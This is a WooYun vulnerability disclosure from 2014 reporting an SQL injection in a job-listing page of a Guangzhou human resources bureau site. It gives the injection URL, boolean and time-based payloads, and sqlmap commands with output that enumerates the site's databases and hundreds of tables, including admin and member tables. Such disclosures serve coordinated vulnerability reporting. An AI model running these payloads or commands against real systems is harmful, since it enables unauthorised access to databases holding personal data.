当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082136

漏洞标题:广州市人力资源和社会保障局分站某处SQL注入

相关厂商:广州市人力资源和社会保障局

漏洞作者: 龍 、

提交时间:2014-11-05 18:46

修复时间:2014-12-20 18:48

公开时间:2014-12-20 18:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-05: 细节已通知厂商并且等待厂商处理中
2014-11-10: 厂商已经确认,细节仅向厂商公开
2014-11-20: 细节向核心白帽子及相关领域专家公开
2014-11-30: 细节向普通白帽子公开
2014-12-10: 细节向实习白帽子公开
2014-12-20: 细节向公众公开

简要描述:

某处SQL注入

详细说明:

广州市人力资源市场服务中心
http://gzsc.gzlm.net/

漏洞证明:

注入点:http://gzsc.gzlm.net/job/company/company-show.php?id=326 AND 5762=5762

QQ图片20141105172246.jpg


2.jpg


D:\sqlmap>sqlmap.py -u http://gzsc.gzlm.net/job/company/company-show.php?id
AND 5762=5762 --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior m
consent is illegal. It is the end user's responsibility to obey all applic
local, state and federal laws. Developers assume no liability and are not r
sible for any misuse or damage caused by this program
[*] starting at 17:18:47
[17:18:47] [INFO] resuming back-end DBMS 'mysql'
[17:18:47] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s)
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=326 AND 5762=5762
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=326 AND SLEEP(5)
---
[17:18:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[17:18:47] [INFO] fetching database names
[17:18:47] [INFO] fetching number of databases
[17:18:47] [WARNING] running in a single-thread mode. Please consider usage
ption '--threads' for faster data retrieval
[17:18:47] [INFO] retrieved: 3
[17:18:49] [INFO] retrieved: information_schema
[17:19:18] [INFO] retrieved: gzsc
[17:19:26] [INFO] retrieved: test
available databases [3]:
[*] gzsc
[*] information_schema
[*] test
[17:19:34] [INFO] fetched data logged to text files under 'C:\Users\Adminis
r\.sqlmap\output\gzsc.gzlm.net'
[*] shutting down at 17:19:34
D:\sqlmap>sqlmap.py -u http://gzsc.gzlm.net/job/company/company-show.php?id
AND 5762=5762 -D gzsc --tables
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior m
consent is illegal. It is the end user's responsibility to obey all applic
local, state and federal laws. Developers assume no liability and are not r
sible for any misuse or damage caused by this program
[*] starting at 17:24:25
[17:24:25] [INFO] resuming back-end DBMS 'mysql'
[17:24:25] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s)
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=326 AND 5762=5762
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=326 AND SLEEP(5)
---
[17:24:26] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[17:24:26] [INFO] fetching tables for database: 'gzsc'
[17:24:26] [INFO] fetching number of tables for database 'gzsc'
[17:24:26] [WARNING] running in a single-thread mode. Please consider usage
ption '--threads' for faster data retrieval
[17:24:26] [INFO] retrieved: 375
[17:24:29] [INFO] retrieved: admin
[17:24:39] [INFO] retrieved: carryout
[17:24:53] [INFO] retrieved: cdb_access
[17:25:10] [INFO] retrieved: cdb_activities
[17:25:25] [INFO] retrieved: cdb_activityapplies
[17:25:42] [INFO] retrieved: cdb_adminactions
[17:26:04] [INFO] retrieved: cdb_admingroups
[17:26:21] [INFO] retrieved: cdb_adminnotes
[17:26:33] [INFO] retrieved: cdb_adminsessions
[17:26:49] [INFO] retrieved: cdb_advertisements
[17:27:12] [INFO] retrieved: cdb_announcements
[17:27:35] [INFO] retrieved: cdb_attachments
[17:27:57] [INFO] retrieved: cdb_attachpaymentlog
[17:28:19] [INFO] retrieved: cdb_attachtypes
[17:28:32] [INFO] retrieved: cdb_banned
[17:28:46] [INFO] retrieved: cdb_bbcodes
[17:29:03] [INFO] retrieved: cdb_buddys
[17:29:15] [INFO] retrieved: cdb_caches
[17:29:29] [INFO] retrieved: cdb_campaigns
[17:29:50] [INFO] retrieved: cdb_creditslog
[17:30:10] [INFO] retrieved: cdb_crons
[17:30:18] [INFO] retrieved: cdb_debateposts
[17:30:40] [INFO] retrieved: cdb_debates
[17:30:50] [INFO] retrieved: cdb_failedlogins
[17:31:14] [INFO] retrieved: cdb_faqs
[17:31:21] [INFO] retrieved: cdb_favorites
[17:31:43] [INFO] retrieved: cdb_forumfields
[17:32:03] [INFO] retrieved: cdb_forumlinks
[17:32:16] [INFO] retrieved: cdb_forumrecommend
[17:32:37] [INFO] retrieved: cdb_forums
[17:32:43] [INFO] retrieved: cdb_imagetypes
[17:33:04] [INFO] retrieved: cdb_invites
[17:33:19] [INFO] retrieved: cdb_itempool
[17:33:35] [INFO] retrieved: cdb_magiclog
[17:33:54] [INFO] retrieved: cdb_magicmarket
[17:34:09] [INFO] retrieved: cdb_magics
[17:34:16] [INFO] retrieved: cdb_medals
[17:34:28] [INFO] retrieved: cdb_memberfields
[17:34:50] [INFO] retrieved: cdb_membermagics
[17:35:12] [INFO] retrieved: cdb_members
[17:35:22] [INFO] retrieved: cdb_memberspaces
[17:35:35] [INFO] retrieved: cdb_moderators
[17:35:55] [INFO] retrieved: cdb_modworks
[17:36:07] [INFO] retrieved: cdb_myposts
[17:36:20] [INFO] retrieved: cdb_mythreads
[17:36:36] [INFO] retrieved: cdb_onlinelist
[17:36:58] [INFO] retrieved: cdb_onlinetime
[17:37:12] [INFO] retrieved: cdb_orders
[17:37:29] [INFO] retrieved: cdb_paymentlog
[17:37:51] [INFO] retrieved: cdb_pluginhooks
[17:38:14] [INFO] retrieved: cdb_plugins
[17:38:20] [INFO] retrieved: cdb_pluginvars
[17:38:32] [INFO] retrieved: cdb_pms
[17:38:39] [INFO] retrieved: cdb_pmsearchindex
[17:39:04] [INFO] retrieved: cdb_polloptions
[17:39:26] [INFO] retrieved: cdb_polls
[17:39:32] [INFO] retrieved: cdb_posts
[17:39:42] [INFO] retrieved: cdb_profilefields
[17:40:07] [INFO] retrieved: cdb_projects
[17:40:20] [INFO] retrieved: cdb_promotions
[17:40:38] [INFO] retrieved: cdb_ranks
[17:40:52] [INFO] retrieved: cdb_ratelog
[17:41:05] [INFO] retrieved: cdb_regips
[17:41:18] [INFO] retrieved: cdb_relatedthreads
[17:41:44] [INFO] retrieved: cdb_rewardlog
[17:42:00] [INFO] retrieved: cdb_rsscaches
[17:42:20] [INFO] retrieved: cdb_searchindex
[17:42:47] [INFO] retrieved: cdb_sessions
[17:43:04] [INFO] retrieved: cdb_settings
[17:43:20] [INFO] retrieved: cdb_smilies
[17:43:36] [INFO] retrieved: cdb_spacecaches
[17:43:59] [INFO] retrieved: cdb_stats
[17:44:10] [INFO] retrieved: cdb_statvars
[17:44:23] [INFO] retrieved: cdb_styles
[17:44:34] [INFO] retrieved: cdb_stylevars
[17:44:44] [INFO] retrieved: cdb_subscriptions
[17:45:08] [INFO] retrieved: cdb_tags
[17:45:20] [INFO] retrieved: cdb_templates
[17:45:43] [INFO] retrieved: cdb_threads
[17:46:00] [INFO] retrieved: cdb_threadsmod
[17:46:11] [INFO] retrieved: cdb_threadtags
[17:46:24] [INFO] retrieved: cdb_threadtypes
[17:46:39] [INFO] retrieved: cdb_tradecomments


123.jpg


修复方案:

版权声明:转载请注明来源 龍 、@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-11-10 10:41

厂商回复:

最新状态:

暂无


漏洞评价:

评论